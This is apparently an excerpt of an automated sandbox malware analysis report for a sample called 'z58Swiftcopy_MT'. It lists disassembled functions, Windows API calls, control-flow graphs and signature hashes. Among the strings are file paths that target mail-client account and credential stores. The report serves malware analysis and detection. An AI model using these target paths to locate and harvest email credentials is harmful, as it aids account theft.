                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 254469556-0
                                                                                                                                                                                                                                      • Opcode ID: 6b454de6580761e36a8169e8a5adf4378d62c58404242bcf8f4f174951ab4c53
                                                                                                                                                                                                                                      • Instruction ID: d98e00222f6710436c3ff2254b6e01b89680650c5038016dca4059ee7f975fcf
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 6b454de6580761e36a8169e8a5adf4378d62c58404242bcf8f4f174951ab4c53
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 7E312B75D453189BDB10DFA5CA89BCDBBF8EF08300F1040AAE80DA7250EB755A868F45
                                                                                                                                                                                                                                      Function 33A72264 Relevance: 6.0, APIs: 4, Instructions: 25timethreadCOMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • GetSystemTimeAsFileTime.KERNEL32(00000000), ref: 33A72276
                                                                                                                                                                                                                                      • GetCurrentThreadId.KERNEL32 ref: 33A72285
                                                                                                                                                                                                                                      • GetCurrentProcessId.KERNEL32 ref: 33A7228E
                                                                                                                                                                                                                                      • QueryPerformanceCounter.KERNEL32(?), ref: 33A7229B
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000002.00000002.32067210118.0000000033A71000.00000040.00001000.00020000.00000000.sdmp, Offset: 33A70000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000002.00000002.32067186886.0000000033A70000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000002.00000002.32067210118.0000000033A86000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_33a70000_z58Swiftcopy_MT.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 2933794660-0
                                                                                                                                                                                                                                      • Opcode ID: d997eed4c6e90f17129f7ae070eba2dd4a9761375cfbd6decbdae1591e4d2386
                                                                                                                                                                                                                                      • Instruction ID: 15636cdcb105604832231e3a0c839f61383a1a34b950a060d1a3673135151d53
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: d997eed4c6e90f17129f7ae070eba2dd4a9761375cfbd6decbdae1591e4d2386
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 0FF05F71C10209EBCB00EBF4C589A9EBBF8FF18305F5144959412F7140E774AB069B51
                                                                                                                                                                                                                                      Function 33A72B1C Relevance: 6.0, APIs: 4, Instructions: 12COMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • SetUnhandledExceptionFilter.KERNEL32(00000000,?,33A72C3B,33A7D1DC,00000017), ref: 33A72B21
                                                                                                                                                                                                                                      • UnhandledExceptionFilter.KERNEL32(33A7D1DC,?,33A72C3B,33A7D1DC,00000017), ref: 33A72B2A
                                                                                                                                                                                                                                      • GetCurrentProcess.KERNEL32(C0000409,?,33A72C3B,33A7D1DC,00000017), ref: 33A72B35
                                                                                                                                                                                                                                      • TerminateProcess.KERNEL32(00000000,?,33A72C3B,33A7D1DC,00000017), ref: 33A72B3C
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000002.00000002.32067210118.0000000033A71000.00000040.00001000.00020000.00000000.sdmp, Offset: 33A70000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000002.00000002.32067186886.0000000033A70000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000002.00000002.32067210118.0000000033A86000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_33a70000_z58Swiftcopy_MT.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: ExceptionFilterProcessUnhandled$CurrentTerminate
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 3231755760-0
                                                                                                                                                                                                                                      • Opcode ID: 42e47c1a0d6fffab9f660a2050e3076d2af56cce3d0c9e760431a18fc0616c19
                                                                                                                                                                                                                                      • Instruction ID: 509be55efdd3972314b3832a4ca0bc32f3bf6fbec99ae72f984c5b0c48a341fb
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 42e47c1a0d6fffab9f660a2050e3076d2af56cce3d0c9e760431a18fc0616c19
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 55D00272044308EBDB003BE9DD9DE993FB8FB08656F046820FB0BA6451DB759457CB65
                                                                                                                                                                                                                                      Function 33A760E2 Relevance: 4.6, APIs: 3, Instructions: 78COMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • IsDebuggerPresent.KERNEL32(?,?,?,?,?,00000000), ref: 33A761DA
                                                                                                                                                                                                                                      • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 33A761E4
                                                                                                                                                                                                                                      • UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,00000000), ref: 33A761F1
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000002.00000002.32067210118.0000000033A71000.00000040.00001000.00020000.00000000.sdmp, Offset: 33A70000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000002.00000002.32067186886.0000000033A70000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000002.00000002.32067210118.0000000033A86000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_33a70000_z58Swiftcopy_MT.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 3906539128-0
                                                                                                                                                                                                                                      • Opcode ID: c72e909472151fddaab076de5240e49c0cb9fc62716a803d7c348088d0447824
                                                                                                                                                                                                                                      • Instruction ID: f7495690fcf254a26dd079c63dc7db72903143a270f209c734e4cfcbffa0b570
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: c72e909472151fddaab076de5240e49c0cb9fc62716a803d7c348088d0447824
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: A231B674D0131C9BCB61DF64D98878DBBB8EF08310F5041EAE81CA7260E7349B868F45
                                                                                                                                                                                                                                      Function 33A74AB4 Relevance: 4.5, APIs: 3, Instructions: 20COMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • GetCurrentProcess.KERNEL32(?,?,33A74A8A,?,33A82238,0000000C,33A74BBD,00000000,00000000,00000001,33A72082,33A82108,0000000C,33A71F3A,?), ref: 33A74AD5
                                                                                                                                                                                                                                      • TerminateProcess.KERNEL32(00000000,?,33A74A8A,?,33A82238,0000000C,33A74BBD,00000000,00000000,00000001,33A72082,33A82108,0000000C,33A71F3A,?), ref: 33A74ADC
                                                                                                                                                                                                                                      • ExitProcess.KERNEL32 ref: 33A74AEE
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000002.00000002.32067210118.0000000033A71000.00000040.00001000.00020000.00000000.sdmp, Offset: 33A70000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000002.00000002.32067186886.0000000033A70000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000002.00000002.32067210118.0000000033A86000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_33a70000_z58Swiftcopy_MT.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: Process$CurrentExitTerminate
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 1703294689-0
                                                                                                                                                                                                                                      • Opcode ID: 6ef7593cb1d66faef61a5674d4ae25e76f63217a6aebd830a39c84565500afbe
                                                                                                                                                                                                                                      • Instruction ID: 02a5105cc9c1716301b0594c23cd64fa576f7cde7189d7d977c8ab8ad34db03e
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 6ef7593cb1d66faef61a5674d4ae25e76f63217a6aebd830a39c84565500afbe
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: C7E0B636400318AFCF017FA8CE99A493BA9EF41381B508029FD469B621DB35DD83CB54
                                                                                                                                                                                                                                      Function 33A72933 Relevance: 1.6, APIs: 1, Instructions: 129COMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • IsProcessorFeaturePresent.KERNEL32(0000000A), ref: 33A7294C
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000002.00000002.32067210118.0000000033A71000.00000040.00001000.00020000.00000000.sdmp, Offset: 33A70000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000002.00000002.32067186886.0000000033A70000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000002.00000002.32067210118.0000000033A86000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_33a70000_z58Swiftcopy_MT.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: FeaturePresentProcessor
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 2325560087-0
                                                                                                                                                                                                                                      • Opcode ID: 90c9eb46bce4102ca3f04427486fd6371e4f96cfec6f52b40f3af72f1feac816
                                                                                                                                                                                                                                      • Instruction ID: 07f5ced89c8405b742747e699d5fafbf1fcdee4d63b757b23ef4ae74213fc772
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 90c9eb46bce4102ca3f04427486fd6371e4f96cfec6f52b40f3af72f1feac816
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 26418DB69013059BEB20DF99C5C169EBBF4FF48310F18856BD849FB294D3749A42CB60
                                                                                                                                                                                                                                      Function 33A7724E Relevance: 1.3, APIs: 1, Instructions: 5memoryCOMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000002.00000002.32067210118.0000000033A71000.00000040.00001000.00020000.00000000.sdmp, Offset: 33A70000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000002.00000002.32067186886.0000000033A70000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000002.00000002.32067210118.0000000033A86000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_33a70000_z58Swiftcopy_MT.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: HeapProcess
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 54951025-0
                                                                                                                                                                                                                                      • Opcode ID: a5a74937159639ae3b0d106ca5871fa37deca3fc89bf464405e138d7474afd4a
                                                                                                                                                                                                                                      • Instruction ID: 8630254dd2de46c8bde86fa25bb2dcc964505cbc22ac3ce5e67ce86d26d434b8
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: a5a74937159639ae3b0d106ca5871fa37deca3fc89bf464405e138d7474afd4a
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 41A011302003028F8300AE38C20A20C3AECEA002803000028A80FE8080EB2088038B00
                                                                                                                                                                                                                                      Function 33A71CCA Relevance: 13.6, APIs: 9, Instructions: 84fileCOMMON
                                                                                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • CopyFileW.KERNEL32(?,?,00000000,?,?,?,?,?,?,00000000), ref: 33A71D1B
                                                                                                                                                                                                                                      • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000080,00000000,?,?,00000000), ref: 33A71D37
                                                                                                                                                                                                                                      • DeleteFileW.KERNEL32(?,?,?,00000000,?,?,?,?,?,?,00000000), ref: 33A71D4B
                                                                                                                                                                                                                                      • GetFileSize.KERNEL32(00000000,00000000,?,?,?,00000000,?,?,?,?,?,?,00000000), ref: 33A71D58
                                                                                                                                                                                                                                      • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,?,?,00000000,?,?,?,?,?,?,00000000), ref: 33A71D72
                                                                                                                                                                                                                                      • CloseHandle.KERNEL32(00000000,?,?,00000000,?,?,?,?,?,?,00000000), ref: 33A71D7D
                                                                                                                                                                                                                                      • DeleteFileW.KERNEL32(?,?,?,00000000,?,?,?,?,?,?,00000000), ref: 33A71D8A
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000002.00000002.32067210118.0000000033A71000.00000040.00001000.00020000.00000000.sdmp, Offset: 33A70000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000002.00000002.32067186886.0000000033A70000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000002.00000002.32067210118.0000000033A86000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_33a70000_z58Swiftcopy_MT.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: File$Delete$CloseCopyCreateHandleReadSize
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 1454806937-0
                                                                                                                                                                                                                                      • Opcode ID: c72c435301f88bad63923b41274ec72e008198931dcdc7394d004f46a6666a20
                                                                                                                                                                                                                                      • Instruction ID: 0738c651fc33203f3c6d05d1eac0ca10b3ad2c854493aaf926c445f1b841e920
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: c72c435301f88bad63923b41274ec72e008198931dcdc7394d004f46a6666a20
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 1621ECB194121CAEE710ABE4CCCCEEA76ECEF18354F040566F916E2140D6749E478B64
                                                                                                                                                                                                                                      Function 33A739BE Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 75COMMON
                                                                                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                                                      control_flow_graph 151 33a739be-33a739c8 152 33a73a6e-33a73a71 151->152 153 33a73a77 152->153 154 33a739cd-33a739dd 152->154 157 33a73a79-33a73a7d 153->157 155 33a739df-33a739e2 154->155 156 33a739ea-33a73a03 LoadLibraryExW 154->156 158 33a73a6b 155->158 159 33a739e8 155->159 160 33a73a55-33a73a5e 156->160 161 33a73a05-33a73a0e GetLastError 156->161 158->152 162 33a73a67-33a73a69 159->162 160->162 163 33a73a60-33a73a61 FreeLibrary 160->163 164 33a73a45 161->164 165 33a73a10-33a73a22 call 33a755f6 161->165 162->158 166 33a73a7e-33a73a80 162->166 163->162 168 33a73a47-33a73a49 164->168 165->164 171 33a73a24-33a73a36 call 33a755f6 165->171 166->157 168->160 169 33a73a4b-33a73a53 168->169 169->158 171->164 174 33a73a38-33a73a43 LoadLibraryExW 171->174 174->168
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000002.00000002.32067210118.0000000033A71000.00000040.00001000.00020000.00000000.sdmp, Offset: 33A70000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000002.00000002.32067186886.0000000033A70000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000002.00000002.32067210118.0000000033A86000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_33a70000_z58Swiftcopy_MT.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                      • String ID: api-ms-$ext-ms-
                                                                                                                                                                                                                                      • API String ID: 0-537541572
                                                                                                                                                                                                                                      • Opcode ID: cdd85f0c32ece8a972548b038206784af4be001977c0bc4a473d684445b4c4d2
                                                                                                                                                                                                                                      • Instruction ID: 8fe24f2090e95cb2a8b788bc2c7298bbb26cea95a9fd2506e3c6bbe3bf98d45e
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: cdd85f0c32ece8a972548b038206784af4be001977c0bc4a473d684445b4c4d2
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 35118BB6A01711FBD71196FDCCC5A1A3758AF417A0F160116ED56BB2C0DB32D902C6D0
                                                                                                                                                                                                                                      Function 33A71000 Relevance: 9.1, APIs: 6, Instructions: 76stringCOMMON
                                                                                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • lstrcatW.KERNEL32(?,?,?,?,?,00000000), ref: 33A71038
                                                                                                                                                                                                                                      • lstrlenW.KERNEL32(?,?,?,?,00000000), ref: 33A7104B
                                                                                                                                                                                                                                      • lstrlenW.KERNEL32(?,?,?,?,00000000), ref: 33A71061
                                                                                                                                                                                                                                      • lstrlenW.KERNEL32(?,?,?,?,?,00000000), ref: 33A71075
                                                                                                                                                                                                                                      • GetFileAttributesW.KERNEL32(?,?,?,00000000), ref: 33A71090
                                                                                                                                                                                                                                      • lstrlenW.KERNEL32(?,?,?,00000000), ref: 33A710B8
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000002.00000002.32067210118.0000000033A71000.00000040.00001000.00020000.00000000.sdmp, Offset: 33A70000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000002.00000002.32067186886.0000000033A70000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000002.00000002.32067210118.0000000033A86000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_33a70000_z58Swiftcopy_MT.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: lstrlen$AttributesFilelstrcat
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 3594823470-0
                                                                                                                                                                                                                                      • Opcode ID: fbd39314fe1b93b9465cd601bd78cae5f794837c8df5adf669bf870dc7138d02
                                                                                                                                                                                                                                      • Instruction ID: daeb7b3203f3654a5c2945a2a6c50456323ed1b82dc44b65e223b30b01ec5474
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: fbd39314fe1b93b9465cd601bd78cae5f794837c8df5adf669bf870dc7138d02
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: F0217F759003189BCF10AAE5ED88EDB37ACEF44214F14429BEC59A71A1DA30DA8BCB40
                                                                                                                                                                                                                                      Function 33A711EA Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 90COMMON
                                                                                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                        • Part of subcall function 33A71E89: lstrlenW.KERNEL32(?,?,?,?,?,33A710DF,?,?,?,00000000), ref: 33A71E9A
                                                                                                                                                                                                                                        • Part of subcall function 33A71E89: lstrcatW.KERNEL32(?,?,?,33A710DF,?,?,?,00000000), ref: 33A71EAC
                                                                                                                                                                                                                                        • Part of subcall function 33A71E89: lstrlenW.KERNEL32(?,?,33A710DF,?,?,?,00000000), ref: 33A71EB3
                                                                                                                                                                                                                                        • Part of subcall function 33A71E89: lstrlenW.KERNEL32(?,?,33A710DF,?,?,?,00000000), ref: 33A71EC8
                                                                                                                                                                                                                                        • Part of subcall function 33A71E89: lstrcatW.KERNEL32(?,33A710DF,?,33A710DF,?,?,?,00000000), ref: 33A71ED3
                                                                                                                                                                                                                                      • GetFileAttributesW.KERNEL32(?,?,?,?), ref: 33A7122A
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000002.00000002.32067210118.0000000033A71000.00000040.00001000.00020000.00000000.sdmp, Offset: 33A70000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000002.00000002.32067186886.0000000033A70000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000002.00000002.32067210118.0000000033A86000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_33a70000_z58Swiftcopy_MT.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: lstrlen$lstrcat$AttributesFile
                                                                                                                                                                                                                                      • String ID: \Accounts\Account.rec0$\Data\AccCfg\Accounts.tdat$\Mail\$\Storage\
                                                                                                                                                                                                                                      • API String ID: 1475205934-1520055953
                                                                                                                                                                                                                                      • Opcode ID: b84c36e2d60da325721145857bc781c83b2d07b3b6e9c1e54af8942ceda15c4b
                                                                                                                                                                                                                                      • Instruction ID: b9b360aac7fa9e4319edf5c29fccede3bb157d200cbab644d8ed09b86326d7cf
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: b84c36e2d60da325721145857bc781c83b2d07b3b6e9c1e54af8942ceda15c4b
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 80218FB9E103086AEB1097E4ECC1BEE7379EF80714F001557FA04EB2D0E6B16E818B59
                                                                                                                                                                                                                                      Function 33A74B39 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 38libraryloaderCOMMON
                                                                                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                                                      control_flow_graph 215 33a74b39-33a74b61 GetModuleHandleExW 216 33a74b86-33a74b8a 215->216 217 33a74b63-33a74b76 GetProcAddress 215->217 220 33a74b95-33a74ba2 call 33a72ada 216->220 221 33a74b8c-33a74b8f FreeLibrary 216->221 218 33a74b85 217->218 219 33a74b78-33a74b83 217->219 218->216 219->218 221->220
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,33A74AEA,?,?,33A74A8A,?,33A82238,0000000C,33A74BBD,00000000,00000000), ref: 33A74B59
                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 33A74B6C
                                                                                                                                                                                                                                      • FreeLibrary.KERNEL32(00000000,?,?,?,33A74AEA,?,?,33A74A8A,?,33A82238,0000000C,33A74BBD,00000000,00000000,00000001,33A72082), ref: 33A74B8F
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000002.00000002.32067210118.0000000033A71000.00000040.00001000.00020000.00000000.sdmp, Offset: 33A70000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000002.00000002.32067186886.0000000033A70000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000002.00000002.32067210118.0000000033A86000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_33a70000_z58Swiftcopy_MT.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: AddressFreeHandleLibraryModuleProc
                                                                                                                                                                                                                                      • String ID: CorExitProcess$mscoree.dll
                                                                                                                                                                                                                                      • API String ID: 4061214504-1276376045
                                                                                                                                                                                                                                      • Opcode ID: fbb7e603b1f6d40958f0539957ea467677a48d52f3eacacc07ff322e80b2fb2e
                                                                                                                                                                                                                                      • Instruction ID: 83e337db8dfa1eecf095e74c4d6ed63f1c8565533f8fd4e38d834337cc6ce5c7
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: fbb7e603b1f6d40958f0539957ea467677a48d52f3eacacc07ff322e80b2fb2e
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 13F03175A00208AFDB11ABD4C888F9E7FB9EF84251F404159E905B6150DB309943CB90
                                                                                                                                                                                                                                      Function 33A79492 Relevance: 7.7, APIs: 5, Instructions: 152fileCOMMON
                                                                                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                                                      control_flow_graph 225 33a79492-33a794ef GetConsoleCP 226 33a794f5-33a79511 225->226 227 33a79632-33a79644 call 33a72ada 225->227 228 33a79513-33a7952a 226->228 229 33a7952c-33a7953d call 33a77c19 226->229 231 33a79566-33a79575 call 33a779e6 228->231 236 33a79563-33a79565 229->236 237 33a7953f-33a79542 229->237 231->227 241 33a7957b-33a7959b WideCharToMultiByte 231->241 236->231 239 33a79609-33a79628 237->239 240 33a79548-33a7955a call 33a779e6 237->240 239->227 240->227 248 33a79560-33a79561 240->248 241->227 242 33a795a1-33a795b7 WriteFile 241->242 244 33a7962a-33a79630 GetLastError 242->244 245 33a795b9-33a795ca 242->245 244->227 245->227 247 33a795cc-33a795d0 245->247 249 33a795d2-33a795f0 WriteFile 247->249 250 33a795fe-33a79601 247->250 248->241 249->244 251 33a795f2-33a795f6 249->251 250->226 252 33a79607 250->252 251->227 253 33a795f8-33a795fb 251->253 252->227 253->250
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • GetConsoleCP.KERNEL32(?,00000000,?,?,?,?,?,?,?,33A79C07,?,00000000,?,00000000,00000000), ref: 33A794D4
                                                                                                                                                                                                                                      • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,?,00000005,00000000,00000000), ref: 33A79590
                                                                                                                                                                                                                                      • WriteFile.KERNEL32(?,?,00000000,33A79C07,00000000,?,?,?,?,?,?,?,?,?,33A79C07,?), ref: 33A795AF
                                                                                                                                                                                                                                      • WriteFile.KERNEL32(?,?,00000001,33A79C07,00000000,?,?,?,?,?,?,?,?,?,33A79C07,?), ref: 33A795E8
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000002.00000002.32067210118.0000000033A71000.00000040.00001000.00020000.00000000.sdmp, Offset: 33A70000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000002.00000002.32067186886.0000000033A70000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000002.00000002.32067210118.0000000033A86000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_33a70000_z58Swiftcopy_MT.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: FileWrite$ByteCharConsoleMultiWide
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 977765425-0
                                                                                                                                                                                                                                      • Opcode ID: cb44c97de9691220bbcd4562d2816bbe7d1b70d607d0e7bb79868d1d1a5d2e20
                                                                                                                                                                                                                                      • Instruction ID: 6b5b58c595f54341c7cbf07b13977167372d4d3416a39daeedad68f05a7aa559
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: cb44c97de9691220bbcd4562d2816bbe7d1b70d607d0e7bb79868d1d1a5d2e20
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 70517DB5A04349AFDB10CFE8C895AEEBBF9EF09310F14415FE955E7281E6709942CB60
                                                                                                                                                                                                                                      Function 33A71E89 Relevance: 7.5, APIs: 5, Instructions: 41stringCOMMON
                                                                                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                                                      control_flow_graph 254 33a71e89-33a71ec0 lstrlenW call 33a72c40 lstrcatW lstrlenW 257 33a71ec2-33a71ec5 254->257 258 33a71ed1-33a71edd lstrcatW 254->258 257->258 259 33a71ec7-33a71ecd lstrlenW 257->259 259->258
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • lstrlenW.KERNEL32(?,?,?,?,?,33A710DF,?,?,?,00000000), ref: 33A71E9A
                                                                                                                                                                                                                                      • lstrcatW.KERNEL32(?,?,?,33A710DF,?,?,?,00000000), ref: 33A71EAC
                                                                                                                                                                                                                                      • lstrlenW.KERNEL32(?,?,33A710DF,?,?,?,00000000), ref: 33A71EB3
